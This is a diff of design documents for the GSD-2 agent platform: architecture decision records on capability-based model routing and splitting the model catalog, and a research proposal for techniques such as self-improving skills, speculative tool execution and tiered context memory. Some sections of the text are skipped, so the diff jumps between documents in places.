Creates a testable, versionable contract for routing behavior + +Capability profiles and task vectors are explicit data structures. Routing decisions are inspectable in verbose mode. The scoring function is a pure function suitable for deterministic unit tests. + +#### 5. Opens the door to adaptive learning + +Existing routing history (`routing-history.ts`) can later refine capability scores per task type. When a model consistently fails at a particular task shape, its effective score for that dimension decreases. This is a natural extension of the existing `getAdaptiveTierAdjustment()` mechanism. + +#### 6. Graceful degradation + +Models without capability profiles get uniform scores, producing the same cheapest-in-tier behavior as today. Zero behavior change for users who don't configure heterogeneous pools. + +### Negative + +#### 1. More metadata to maintain + +Built-in model profiles will drift as model families evolve. Mitigation: profiles live in a single data table, versioned with GSD releases, with a lint rule for completeness. + +#### 2. Scoring can create false precision + +A `0–100` capability scale looks exact but is still heuristic. Mitigation: document profiles as "relative rankings, not benchmarks." The 2-point tie-breaking threshold prevents insignificant score differences from overriding cost optimization. + +#### 3. More routing complexity + +The current tier router is simple to explain and debug. Multi-dimensional scoring is more powerful but harder to reason about. Mitigation: verbose observability output shows scores and reasons. The `selectionMethod` field in routing decisions makes it clear whether capability scoring was active. + +#### 4. 
Stronger test requirements + +The router will need coverage for: + +- profile loading and override merge rules (partial deep-merge from `modelOverrides`) +- `computeTaskRequirements()` with various unit types and metadata combinations +- scoring function correctness (weighted average, tie-breaking) +- interaction with tier eligibility filtering +- budget pressure applied before scoring, not conflicting with it +- fallback behavior when no scored model is eligible +- graceful degradation when no profiles exist (uniform scores) +- `before_model_select` hook contract (extension path) + +#### 5. New hook surface to maintain + +The `before_model_select` hook adds a new extension API contract that must be maintained across releases. Mitigation: the hook is narrowly scoped — one event type, optional return. + +### Neutral / Migration + +#### 1. Tier-based routing does not disappear + +Complexity tiers remain as: + +- the primary "how hard is this" signal that determines tier eligibility +- the fallback behavior for models without capability profiles +- the escalation path on retries (light → standard → heavy) + +Capability scoring adds the "what kind of work" signal on top. The two systems are layered, not competing. + +#### 2. Existing preferences continue to work + +`dynamic_routing.tier_models` still works — it pins a specific model per tier, bypassing capability scoring for that tier. Per-phase model overrides (`models.planning`, `models.execution`, etc.) continue to set the ceiling. No existing configuration breaks. + +#### 3. Documentation update required + +`docs/dynamic-model-routing.md` must be updated to explain: + +- what capability profiles are and how to override them +- how scoring interacts with tier routing +- how to read verbose routing output +- how to use `before_model_select` for custom routing extensions + +## Risks + +### 1. 
Hardcoded vendor stereotypes become stale + +If the default profiles are not reviewed regularly, GSD will encode outdated assumptions about which models are "best" at which tasks. + +**Mitigation:** Keep defaults in a single data table (not scattered conditionals). Lint for completeness against the model catalog. User overrides via `modelOverrides` provide immediate escape hatch. Document profiles as heuristic rankings, not benchmarks. + +### 2. Budget logic and capability logic may conflict in user perception + +The highest-scoring model may not be selected because budget pressure constrained the eligible tier. This could look inconsistent if the user doesn't understand the pipeline order. + +**Mitigation:** Pipeline order is explicit and enforced in code: +1. Complexity classification determines tier +2. Budget pressure may downgrade tier +3. Tier-eligible models are filtered (downgrade-only from user ceiling) +4. Capability scoring ranks the eligible set +5. Cost tie-breaks within scoring threshold + +Verbose output shows each step. The user sees "budget pressure: 85%" in the reason string when downgrade occurs. + +### 3. Task-type classification may be too coarse initially + +A unit type like `execute-task` contains many sub-shapes. The initial base vector plus metadata refinement may not distinguish all meaningful cases. + +**Mitigation:** The `computeTaskRequirements()` function is designed for iterative refinement. The existing `TaskMetadata` already captures tags, complexity keywords, file counts, dependency counts, and code block counts. New metadata signals can be added to the existing `extractTaskMetadata()` without changing the scoring function. Routing history provides signal on where refinement is needed. + +### 4. Unknown and custom models may score poorly by default + +Users often bring custom provider IDs, local models, or vendor aliases that will not exist in the built-in profile table. 
+ +**Mitigation:** Unknown models receive uniform scores (50 across all dimensions), making capability scoring a no-op — they compete on cost within their tier, same as today. Users can add capability profiles via `modelOverrides` in `models.json` for models they know well. + +### 5. Extension hook adds API surface + +The `before_model_select` hook creates a contract that extensions may depend on. + +**Mitigation:** The hook has a narrow, well-defined interface. It is additive (existing hooks unchanged). The return type is simple (`{ modelId } | undefined`). Breaking changes would be handled through the same extension API versioning as other hooks. + +## Alternatives Considered + +### A. Keep pure complexity-tier routing + +Rejected because it optimizes cost within a tier but still treats meaningfully different models as interchangeable. The existing `MODEL_CAPABILITY_TIER` table already proves this is a recognized gap — it just stops at three buckets. + +### B. Hardcode task → model mappings + +Rejected because it breaks as soon as the user does not have the expected model. This is appropriate for a closed product with a fixed fleet, not for GSD's user-configured provider model. + +### C. Route only by user-specified per-phase models + +Rejected because it pushes all routing intelligence onto the user and does not adapt to retries, task subtype, or provider heterogeneity. + +### D. Use capability-aware routing only as an extension, never in core + +Not rejected as a starting point, but insufficient as the long-term architecture. Extension prototyping is the recommended first phase. However, coherent preferences, diagnostics, testing, and profile versioning will likely require core integration if the model proves valuable. + +### E. Add `costEfficiency` as a capability dimension + +Rejected because it conflates two concerns. 
If cost appears in both the scoring function and the budget constraint, the router has two competing cost signals that produce confusing behavior (e.g., a cheap model wins on `costEfficiency` score but then gets filtered out by budget pressure, or vice versa). Cost constrains eligibility; capability determines ranking.
+
+### F. Use static requirement vectors per unit type (no metadata refinement)
+
+Rejected because the existing `classifyUnitComplexity()` already proves that unit type alone is too coarse. An `execute-task` for docs vs. an `execute-task` for migration are categorically different. The metadata signals (tags, complexity keywords, file counts) that the classifier already extracts should inform requirement vectors.
+
+## Appendix: Current Architecture Reference
+
+For implementors, the current routing pipeline files:
+
+| File | Role |
+|------|------|
+| `auto-dispatch.ts` | Rule table that determines unit type + prompt |
+| `auto-model-selection.ts` | Orchestrates model selection for each dispatch |
+| `complexity-classifier.ts` | Tier classification with task metadata analysis |
+| `model-router.ts` | Tier → model resolution with downgrade-only semantics |
+| `routing-history.ts` | Adaptive learning from success/failure patterns |
+| `preferences-models.ts` | Per-phase model config resolution and fallbacks |
+| `register-hooks.ts` | Hook registration including `before_provider_request` |
+
+The capability scoring additions would primarily touch `model-router.ts` (profiles, scoring function) and `auto-model-selection.ts` (passing metadata to the router, new hook point). 
diff --git a/docs/ADR-007-model-catalog-split.md b/docs/ADR-007-model-catalog-split.md new file mode 100644 index 000000000..8ed426add --- /dev/null +++ b/docs/ADR-007-model-catalog-split.md @@ -0,0 +1,285 @@ +# ADR-007: Model Catalog Split and Provider API Encapsulation + +**Status:** Proposed +**Date:** 2026-04-03 +**Deciders:** Jeremy McSpadden +**Related:** ADR-004 (capability-aware model routing), [ADR-005](https://github.com/gsd-build/gsd-2/issues/2790), [ADR-006](https://github.com/gsd-build/gsd-2/issues/2995), `packages/pi-ai/src/providers/`, `packages/pi-ai/src/models.ts` + +## Context + +The model/provider system in `pi-ai` has two structural problems worth fixing — but the system is **not fundamentally broken**. The heavy lifting (lazy SDK imports, registry-based dispatch, extension-based registration) is already well-designed. This ADR targets the two areas where the current design creates real friction without proposing unnecessary runtime changes. + +### Current Architecture + +``` +stream.ts + └─ import "./providers/register-builtins.js" ← side-effect import at load time + ├─ import anthropic.ts (6.8 KB) + ├─ import anthropic-vertex.ts (3.9 KB) + ├─ import openai-completions.ts (26 KB) + ├─ import openai-responses.ts (6.4 KB) + ├─ import openai-codex-responses.ts (29 KB) + ├─ import azure-openai-responses.ts (7.8 KB) + ├─ import google.ts (13.6 KB) + ├─ import google-vertex.ts (14.5 KB) + ├─ import google-gemini-cli.ts (30 KB) + ├─ import mistral.ts (18.9 KB) + └─ amazon-bedrock.ts (24 KB) ← only lazy-loaded provider + +models.ts + └─ import models.generated.ts ← 13,848 lines, ALL providers, loaded at init + └─ import models.custom.ts ← 197 lines, additional providers +``` + +### What Already Works Well + +1. **SDK lazy loading.** Every provider file uses `async function getXxxClass()` with a cached dynamic `import()`. 
The heavy npm packages (`@anthropic-ai/sdk`, `openai`, `@google/genai`, `@aws-sdk/*`, `@mistralai/*`) are only loaded on first API call. This is where the real startup cost would be — and it's already handled. + +2. **Registry-based dispatch.** `api-registry.ts` cleanly maps API types to stream functions. Callers use `stream(model, context)` and the registry routes to the right provider. This pattern is sound. + +3. **Extension registration.** Ollama and Claude Code CLI register via `registerApiProvider()` at runtime. This extensibility point works correctly. + +4. **Provider implementation code loading (~200KB total).** While all providers load eagerly, V8 parses local `.js` files in single-digit milliseconds each. The total parse cost for all provider files is ~10-30ms — not a user-visible bottleneck on a CLI that's about to make a multi-second API call anyway. + +### What's Actually Worth Fixing + +#### Problem 1: Monolithic model catalog — developer experience, not runtime + +`models.generated.ts` is **13,848 lines in a single file**. This creates real friction: + +- **PR reviews are painful.** When the generation script runs, the diff is a wall of changes across unrelated providers. Reviewers can't tell what actually changed for a specific provider. +- **Navigation is slow.** Finding a specific model requires scrolling or searching through thousands of lines of static object literals. +- **Merge conflicts are frequent.** Any two PRs that touch model generation will conflict on the same monolithic file. +- **Git blame is useless.** Every line was "last changed" by the generation script, obscuring the history of individual provider additions. + +The runtime cost of loading all model definitions is negligible — a Map of ~200 model objects is maybe 50-100KB of heap. The problem is purely about code organization and developer workflow. 
+ +#### Problem 2: Barrel export leaks provider internals — API design + +`packages/pi-ai/src/index.ts` re-exports every provider module's internals: + +```typescript +export * from "./providers/anthropic.js"; +export * from "./providers/google.js"; +export * from "./providers/google-gemini-cli.js"; +export * from "./providers/google-vertex.js"; +export * from "./providers/mistral.js"; +export * from "./providers/openai-completions.js"; +export * from "./providers/openai-responses.js"; +// ... etc +``` + +This is a public API problem: + +- **Consumers can bypass the registry.** Any code that `import { streamAnthropic } from "pi-ai"` has a direct dependency on an implementation detail that should be internal. +- **Refactoring is blocked.** Renaming a function inside a provider file is a breaking change because it's re-exported from the package root. +- **API surface is unnecessarily large.** The public API should be `stream()`, `streamSimple()`, `registerApiProvider()`, model utilities, and types. Provider-specific stream functions are implementation details. + +### What Is NOT Worth Changing + +**Lazy provider loading (converting `register-builtins.ts` to async on-demand loading).** This was considered and rejected because: + +1. **The SDKs are already lazy.** The heavy cost is handled. Provider implementation code (~200KB of local `.js`) parses in ~10-30ms total. +2. **Async resolution adds complexity to the hot path.** `stream.ts` currently does a synchronous `Map.get()`. Making `resolveApiProvider` async adds a microtask hop to every API call — not just the first. Small but measurable, and for no user-visible gain. +3. **High blast radius, low payoff.** Touching `stream.ts`, `api-registry.ts`, and the registration lifecycle simultaneously risks regressions in the core streaming path for an optimization that wouldn't show up in profiling. +4. 
**Bedrock's lazy loading is a special case, not a template.** It exists because `@aws-sdk/client-bedrock-runtime` is uniquely massive. Generalizing this pattern to providers where the SDK is already lazy-imported doesn't compound the benefit. + +## Decision + +**Make two targeted improvements to code organization and API hygiene. Do not change runtime loading behavior.** + +### Change 1: Split `models.generated.ts` into per-provider files + +Replace the monolithic 13,848-line generated file with per-provider files: + +``` +packages/pi-ai/src/models/ + ├── index.ts ← re-exports combined registry, same public API + ├── generated/ + │ ├── anthropic.ts ← Anthropic model definitions + │ ├── openai.ts ← OpenAI model definitions + │ ├── google.ts ← Google model definitions + │ ├── mistral.ts ← Mistral model definitions + │ ├── amazon-bedrock.ts ← Bedrock model definitions + │ ├── groq.ts ← Groq model definitions + │ ├── xai.ts ← xAI model definitions + │ ├── cerebras.ts ← Cerebras model definitions + │ ├── openrouter.ts ← OpenRouter model definitions + │ └── ... ← one file per provider in the catalog + ├── custom.ts ← replaces models.custom.ts (unchanged content) + └── capability-patches.ts ← CAPABILITY_PATCHES extracted for clarity +``` + +**`models/index.ts` keeps the exact same synchronous public API:** + +```typescript +// models/index.ts +// GSD-2 — Model registry (split by provider for maintainability) + +import { ANTHROPIC_MODELS } from "./generated/anthropic.js"; +import { OPENAI_MODELS } from "./generated/openai.js"; +import { GOOGLE_MODELS } from "./generated/google.js"; +// ... one import per provider + +import { CUSTOM_MODELS } from "./custom.js"; +import { CAPABILITY_PATCHES, applyCapabilityPatches } from "./capability-patches.js"; +import type { Api, KnownProvider, Model, Usage } from "../types.js"; + +// Combine all generated models into single registry — same as today +const MODELS = { + ...ANTHROPIC_MODELS, + ...OPENAI_MODELS, + ...GOOGLE_MODELS, + // ... 
+}; + +// Rest of the file is identical to current models.ts: +// modelRegistry Map construction, capability patch application, +// getModel(), getProviders(), getModels(), calculateCost(), +// supportsXhigh(), modelsAreEqual() +``` + +**Key constraint: loading stays synchronous and eager.** All model files are statically imported. The Map is built at module init exactly as today. No async, no lazy loading, no runtime behavior change. This is purely a file organization change. + +**Update `generate-models.ts`** to emit one file per provider instead of a single `models.generated.ts`. The script already groups models by provider internally — it just needs to write separate files instead of one. + +#### Why this matters + +| Before | After | +|--------|-------| +| PR diffs show 13K-line file changes | PR diffs scoped to the provider that changed | +| Merge conflicts on any concurrent model update | Conflicts only when same provider is touched | +| `git blame` shows "regenerate models" for every line | `git blame` shows per-provider history | +| Finding a model = search through 13K lines | Finding a model = open the provider file | +| One reviewer must understand all providers | Reviewers only need context for affected provider | + +### Change 2: Stop barrel-exporting provider internals + +**Update `packages/pi-ai/src/index.ts`:** + +```typescript +// Before (current — 17 re-exports including all providers): +export * from "./providers/anthropic.js"; +export * from "./providers/azure-openai-responses.js"; +export * from "./providers/google.js"; +export * from "./providers/google-gemini-cli.js"; +export * from "./providers/google-vertex.js"; +export * from "./providers/mistral.js"; +export * from "./providers/openai-completions.js"; +export * from "./providers/openai-responses.js"; +export * from "./providers/register-builtins.js"; +// ... 
+ +// After (clean public API): +export * from "./api-registry.js"; +export * from "./env-api-keys.js"; +export * from "./models/index.js"; +export * from "./providers/register-builtins.js"; // resetApiProviders() is public +export * from "./stream.js"; +export * from "./types.js"; +export * from "./utils/event-stream.js"; +export * from "./utils/json-parse.js"; +export type { OAuthAuthInfo, OAuthCredentials, /* ... */ } from "./utils/oauth/types.js"; +export * from "./utils/overflow.js"; +export * from "./utils/typebox-helpers.js"; +export * from "./utils/repair-tool-json.js"; +export * from "./utils/validation.js"; +``` + +Provider-specific exports (`streamAnthropic`, `streamGoogle`, etc.) are removed from the public API. Any external consumer that imported them directly should use the registry-based `stream()` / `streamSimple()` functions instead — which is how all internal callers already work. + +#### Why this matters + +- **Enforces the registry pattern.** The correct way to call a provider is `stream(model, context)`. Direct provider function imports create fragile coupling. +- **Enables future refactoring.** Provider internal function signatures can change without breaking the package API. Today, renaming `streamAnthropic` would be a semver-breaking change. +- **Reduces API surface.** Consumers see only what they need: `stream`, `streamSimple`, `registerApiProvider`, model utilities, and types. 
+ +### What Does NOT Change + +- **Runtime behavior** — all providers still load eagerly, same as today +- **The `Model` type system** — all types, interfaces, and generics stay the same +- **The `ApiProvider` interface** — providers still implement `{ api, stream, streamSimple }` +- **The `api-registry.ts` registry** — synchronous `Map.get()` dispatch, unchanged +- **`stream.ts`** — no changes to the streaming entry point +- **`register-builtins.ts`** — still eagerly imports and registers all providers (only `resetApiProviders` remains in barrel export) +- **The extension system** — `registerApiProvider()` continues to work for Ollama, Claude Code CLI, etc. +- **`models.json` user config** — custom models, overrides, provider settings are unaffected +- **Model discovery** — discovery adapters are already lazy and independent +- **Model routing** — ADR-004's capability-aware routing is orthogonal + +## Consequences + +### Positive + +1. **Cleaner PRs.** Model catalog changes are scoped to the provider that changed. Reviewers see a 200-line diff in `models/generated/openai.ts` instead of a 13K-line diff in `models.generated.ts`. + +2. **Fewer merge conflicts.** Two PRs that update different providers no longer conflict on the same file. + +3. **Better navigability.** Developers can jump directly to `models/generated/anthropic.ts` to see Anthropic's model definitions instead of searching through a monolith. + +4. **Cleaner package API.** `pi-ai` exports only what consumers need. Provider internals are properly encapsulated. + +5. **Future-proofs refactoring.** Provider implementation details can evolve without breaking the public API contract. + +6. **Zero runtime risk.** No changes to loading, registration, streaming, or dispatch. The refactor is purely structural. + +### Negative + +1. **More files.** Instead of 1 generated file + 1 custom file, we'll have ~15-20 generated files. Marginal complexity increase, but each file is focused and small. + +2. 
- High migration effort and regression risk for a negligible performance gain
7. Delete the superseded `models.generated.ts` (and, if step 4's move left a copy behind, the old `models.custom.ts`)
Semantic Context Compression](#4-semantic-context-compression) +- [5. Cross-Session Learning Graph](#5-cross-session-learning-graph) +- [6. MCTS-Based Planning](#6-mcts-based-planning) +- [Priority Matrix](#priority-matrix) +- [Sources & References](#sources--references) + +--- + +## Executive Summary + +GSD-2 is a multi-layered, event-driven agent platform with strong extensibility primitives: a skill system, file-based memory, session branching, compaction, and 16+ extension lifecycle hooks. These existing primitives create natural integration points for six frontier techniques that could fundamentally change how GSD operates. + +The techniques fall into three categories: + +| Category | Techniques | Theme | +|----------|-----------|-------| +| **Self-Improvement** | Skill Library Evolution, Cross-Session Learning Graph | GSD gets better the more you use it | +| **Performance** | DAG Tool Execution, Speculative Tool Execution | GSD gets faster per turn | +| **Intelligence** | Semantic Context Compression, MCTS Planning | GSD reasons better with the same context budget | + +--- + +## 1. Skill Library Evolution + +**Category:** Self-Improvement +**Impact:** Massive | **Effort:** Medium | **Priority:** #1 + +### What It Is + +Inspired by [SkillRL](https://arxiv.org/abs/2602.08234) (ICLR 2026), this technique transforms GSD's skill system from static instruction files into a self-improving knowledge base. Instead of skills being written once and updated manually, they evolve based on execution outcomes. + +SkillRL demonstrates that agents with learned skill libraries outperform baselines by 15.3%+ across task benchmarks, with 10-20% token compression compared to raw trajectory storage. + +### How It Works + +``` +┌─────────────────────────────────────────────────────────┐ +│ EXECUTION LOOP │ +│ │ +│ 1. Skill invoked → agent executes task │ +│ 2. Outcome captured (success/failure + trajectory) │ +│ 3. 
Trajectory distilled: │ +│ ├─ Success → strategic pattern extracted │ +│ └─ Failure → anti-pattern + lesson recorded │ +│ 4. Skill file updated with versioned improvement │ +│ 5. Next invocation benefits from accumulated learnings │ +│ │ +└─────────────────────────────────────────────────────────┘ +``` + +**Two types of learned knowledge:** + +| Type | Description | Example | +|------|-------------|---------| +| **General Skills** | Universal strategic guidance applicable across tasks | "When editing TypeScript files, always check for type errors via LSP before committing" | +| **Task-Specific Skills** | Category-level heuristics for specific skill domains | "The `fix-issue` skill should check CI status before opening a PR, not after" | + +### Why It Fits GSD-2 + +GSD already has every primitive needed: + +- **Skill files** (`~/.claude/skills/`, `.claude/skills/`) — the storage layer exists +- **Extension hooks** (`turn_end`, `agent_end`) — outcome capture points exist +- **Memory system** (MEMORY.md + individual files) — persistence exists +- **`/improve-skill` and `/heal-skill` commands** — manual versions of this loop already exist + +The gap is automation: connecting execution outcomes back to skill files without human intervention. 
+ +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `agent-session.ts` → `turn_end` event | Captures execution outcome (success/failure signals) | +| Extension hook: `agent_end` | Triggers trajectory distillation | +| Skill file system | Receives versioned updates with learned patterns | +| `compaction.ts` | Provides trajectory data from the session for distillation | + +### Architecture + +``` +User invokes skill + │ + ▼ +┌──────────────┐ ┌──────────────────┐ +│ AgentSession │────▶│ Skill Executor │ +│ (turn_end) │ │ (tracks outcome) │ +└──────────────┘ └────────┬─────────┘ + │ + ┌─────────▼──────────┐ + │ Outcome Classifier │ + │ (success/failure/ │ + │ partial) │ + └─────────┬──────────┘ + │ + ┌───────────────┼───────────────┐ + ▼ ▼ ▼ + ┌────────────┐ ┌──────────────┐ ┌───────────┐ + │ Success │ │ Failure │ │ Partial │ + │ Distiller │ │ Distiller │ │ Analyzer │ + └─────┬──────┘ └──────┬───────┘ └─────┬─────┘ + │ │ │ + ▼ ▼ ▼ + ┌─────────────────────────────────────────────┐ + │ Skill File Updater │ + │ • Appends learned pattern to skill │ + │ • Versions the update │ + │ • Preserves original skill intent │ + └─────────────────────────────────────────────┘ +``` + +### Open Questions + +- **Drift prevention:** How to prevent accumulated learnings from overwhelming the original skill intent? +- **Conflict resolution:** What happens when a lesson from one session contradicts another? +- **Quality gate:** Should updates require a validation pass before being written? + +--- + +## 2. DAG-Based Parallel Tool Execution + +**Category:** Performance +**Impact:** High | **Effort:** Medium | **Priority:** #2 + +### What It Is + +The [LLM Compiler pattern](https://arxiv.org/pdf/2312.04511) (ICML 2024) treats multi-tool workflows like a compiler optimization pass. When the model returns multiple tool calls in a single response, instead of executing them sequentially, the system: + +1. 
**Estimated impact:** A typical coding turn involves 3-5 tool calls. With 60% parallelizable (reads, greps, globs), per-turn latency drops by 40-60%. Over a 50-turn session, that's minutes saved.
Correct predictions eliminate the first tool-call round-trip entirely. Wrong predictions are simply discarded; their only cost is the wasted pre-execution compute.
+ +### How It Works + +``` +┌─────────────────────────────────────────────────────────────┐ +│ User: "fix the bug in auth.ts" │ +│ │ +│ BEFORE model responds: │ +│ Speculator predicts: │ +│ ├─ Read("auth.ts") → pre-executed ✓ │ +│ ├─ Grep("error|bug", "auth") → pre-executed ✓ │ +│ ├─ LSP diagnostics(auth.ts) → pre-executed ✓ │ +│ └─ Read("auth.test.ts") → pre-executed ✓ │ +│ │ +│ Model responds with tool calls: │ +│ ├─ Read("auth.ts") → CACHE HIT (0ms) │ +│ ├─ Read("auth.test.ts") → CACHE HIT (0ms) │ +│ └─ Grep("login", "src/") → cache miss (execute) │ +│ │ +│ Hit rate: 2/3 = 67% │ +│ Latency saved: ~300ms on this turn │ +└─────────────────────────────────────────────────────────────┘ +``` + +**Prediction strategies (simplest to most sophisticated):** + +| Strategy | Description | Expected Hit Rate | +|----------|-------------|-------------------| +| **Keyword extraction** | Parse user prompt for file paths, function names → Read those files | 40-60% | +| **Session history** | Track which tools follow which user prompt patterns | 50-70% | +| **Learned patterns** | Use the skill library evolution data to predict tool sequences | 60-80% | +| **Model pre-query** | Ask a fast/cheap model to predict tool calls | 70-85% | + +### Why It Fits GSD-2 + +The #1 latency bottleneck in GSD is the round-trip: user prompt → model thinks → model requests tool → tool executes → result sent back → model thinks again. Speculative execution attacks the highest-latency step. 
+ +GSD's architecture makes this easy to add: +- `AgentSession.prompt()` already processes user input before sending to the model +- Tool results are already cached in the message array +- The extension system can intercept input and spawn pre-fetches + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `AgentSession.prompt()` | Trigger speculation after user input, before model call | +| Tool result cache (new) | Store speculated results keyed by tool+args | +| `agent-loop.ts` tool execution | Check cache before executing; serve cached result on hit | +| Extension hook: `input` | Parse user intent for file paths, patterns | + +### Architecture + +``` +User input arrives + │ + ├──────────────────────────────────────┐ + │ │ + ▼ ▼ +┌───────────────┐ ┌──────────────────┐ +│ Send to LLM │ │ Speculator │ +│ (normal path) │ │ • Extract paths │ +│ │ │ • Predict tools │ +│ ... waiting │ │ • Pre-execute │ +│ for response │ │ • Cache results │ +│ │ └──────────────────┘ +│ │ │ +│ │◀─── model returns ──────────│ +│ │ tool_use blocks │ +└───────┬───────┘ │ + │ │ + ▼ │ +┌───────────────┐ │ +│ Tool Executor │◀──── check cache ───────────┘ +│ • Cache hit? │ +│ → return │ +│ • Cache miss? │ +│ → execute │ +└───────────────┘ +``` + +### Cost Analysis + +| Scenario | Cost | +|----------|------| +| **Correct prediction** | ~0ms latency (result already available). Compute cost: the pre-execution itself (trivial for Read/Grep). | +| **Wrong prediction** | Wasted compute for the pre-executed tool. For Read/Grep/Glob, this is <10ms of I/O. | +| **Partial hit** | Net positive as long as hit rate > 20% (given how cheap misses are). | + +### Open Questions + +- **TTL for cached results:** How long are speculated results valid? File contents can change between speculation and model request. +- **Side effects:** Should only pure tools (Read, Grep, Glob, LSP) be speculatable? 
+- **Resource limits:** Cap on number of speculative executions per turn to prevent I/O storms? + +--- + +## 4. Semantic Context Compression + +**Category:** Intelligence +**Impact:** High | **Effort:** High | **Priority:** #4 + +### What It Is + +GSD's compaction system uses a char/4 heuristic for token estimation and all-or-nothing LLM summarization for context reduction. Research from [Zylos](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) and [context engineering literature](https://rlancemartin.github.io/2025/06/23/context_engineering/) shows that embedding-based compression achieves 80-90% token reduction while preserving the ability to selectively recall specific historical context. + +### Current GSD Compaction (Weaknesses Highlighted) + +``` +Messages: [M1, M2, M3, M4, M5, M6, M7, M8, M9, M10] + ▲ +Token budget exceeded │ recent + │ +Current approach: +┌─────────────────────────┬─────────────────────────┐ +│ M1-M6: LLM-summarized │ M7-M10: kept verbatim │ +│ into single blob │ (last ~20k tokens) │ +│ │ │ +│ ⚠ All detail lost │ ✓ Full fidelity │ +│ ⚠ No selective recall │ │ +│ ⚠ char/4 overestimates │ │ +└─────────────────────────┴─────────────────────────┘ +``` + +**Three specific weaknesses:** + +| Weakness | Impact | Current Code Location | +|----------|--------|-----------------------| +| char/4 token estimation | ~25% overestimate → compacts too early → wastes context | `compaction.ts:201-259` | +| All-or-nothing summarization | Loses specific details that may be relevant later | `compaction.ts:327-400` | +| No retrieval from compacted history | Once summarized, detail is gone forever | `compaction-orchestrator.ts` | + +### Proposed: Tiered Memory Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ HOT TIER │ +│ Recent turns (last ~20k tokens) │ +│ Full text, full fidelity │ +│ Storage: in-context messages │ +│ Access: always in prompt │ 
+├─────────────────────────────────────────────────────────┤ +│ WARM TIER │ +│ Older turns (beyond context window) │ +│ Stored as embeddings + compressed text │ +│ Storage: session-local vector index │ +│ Access: retrieved when semantically relevant to │ +│ current turn │ +│ Token cost: only retrieved segments count │ +├─────────────────────────────────────────────────────────┤ +│ COLD TIER │ +│ Ancient turns / previous sessions │ +│ Stored as summaries + metadata │ +│ Storage: disk (existing session files) │ +│ Access: retrieved only on explicit recall │ +│ Token cost: minimal summary headers │ +└─────────────────────────────────────────────────────────┘ +``` + +**How retrieval works per turn:** + +``` +New user prompt arrives + │ + ▼ +┌───────────────────┐ +│ Embed the prompt │ (compute embedding of user's question) +└────────┬──────────┘ + │ + ├──── query warm tier ──▶ top-K relevant historical turns + │ (cosine similarity > threshold) + │ + ├──── always include ──▶ hot tier (recent turns, full text) + │ + ▼ +┌───────────────────┐ +│ Compose context │ +│ = hot + retrieved │ +│ + system prompt │ +└───────────────────┘ +``` + +### Token Estimation Improvement + +Replace char/4 with adaptive estimation: + +| Approach | Accuracy | Cost | +|----------|----------|------| +| **char/4 (current)** | ~75% (overestimates) | Zero | +| **Provider-reported usage** | 100% (for last turn) | Zero (already tracked) | +| **tiktoken/provider tokenizer** | ~98% | ~5ms per message | +| **Hybrid: actual for recent, char/4 for old** | ~95% | Negligible | + +The hybrid approach — use actual token counts from provider responses for recent messages, fall back to char/4 for older messages — is a quick win that requires no new dependencies. 
+ +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `compaction.ts` | Replace cut-point algorithm with tiered approach | +| `compaction-orchestrator.ts` | Add warm-tier retrieval before model call | +| `agent-session.ts` message building | Inject retrieved warm-tier segments | +| Session persistence layer | Store embeddings alongside session entries | + +### Open Questions + +- **Embedding model:** Local (fast, private) or API (better quality, adds latency)? +- **Index format:** Simple cosine similarity on flat arrays vs. HNSW index? +- **Retrieval budget:** How many tokens to allocate to warm-tier retrievals per turn? +- **Coherence:** How to prevent retrieved historical context from confusing the model about the current state? + +--- + +## 5. Cross-Session Learning Graph + +**Category:** Self-Improvement +**Impact:** Transformative | **Effort:** High | **Priority:** #5 + +### What It Is + +GSD's memory system (MEMORY.md + individual files) stores flat, file-based memories. A learning graph extends this into a structured knowledge base that captures relationships between codebases, files, errors, solutions, and patterns across all sessions. + +This is informed by research on [agent memory architectures](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) and the emerging discipline of [context engineering](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/). 
+ +### Current Memory vs Learning Graph + +| Aspect | Current (MEMORY.md) | Learning Graph | +|--------|---------------------|----------------| +| **Structure** | Flat file list | Nodes + edges (graph) | +| **Relationships** | None | "file X often breaks when Y changes" | +| **Retrieval** | All loaded into context | Query-driven, only relevant nodes | +| **Learning** | Manual (user says "remember X") | Automatic from execution outcomes | +| **Scope** | Per-project directory | Per-project with cross-project patterns | +| **Staleness** | Manual cleanup | Confidence decay over time | + +### Graph Schema + +``` +┌──────────┐ touches ┌──────────┐ +│ Session │────────────────▶│ File │ +│ │ │ │ +│ • date │ │ • path │ +│ • outcome │ │ • type │ +│ • tokens │ │ • churn │ +└────┬──────┘ └─────┬─────┘ + │ │ + │ encountered │ involved_in + │ │ + ▼ ▼ +┌──────────┐ resolved_by ┌──────────┐ +│ Error │────────────────▶│ Solution │ +│ │ │ │ +│ • type │ │ • pattern │ +│ • message │ │ • success │ +│ • freq │ │ rate │ +└──────────┘ └──────────┘ + │ │ + │ prevented_by │ uses + │ │ + ▼ ▼ +┌──────────┐ ┌──────────┐ +│ Pattern │ │ Tool │ +│ │ │ │ +│ • type │ │ • name │ +│ • desc │ │ • avg │ +│ • conf │ │ time │ +└──────────┘ └──────────┘ +``` + +### Example Queries + +| Query | Result | +|-------|--------| +| "What errors have occurred in `auth.ts`?" | List of error nodes connected to that file node | +| "What's the typical fix for `TypeError` in this codebase?" | Solution nodes with highest success rate for that error type | +| "Which files tend to break together?" | File clusters with high co-occurrence in error sessions | +| "What tools are slowest in this project?" 
Inspired by [ToolTree](https://www.agentic-patterns.com/patterns/skill-library-evolution/) <!-- NOTE(review): this URL points to the Skill Library Evolution pattern, not a ToolTree reference — verify link --> and Monte Carlo Tree Search, this technique replaces GSD's linear action selection with a tree-based planner that explores multiple solution paths simultaneously.
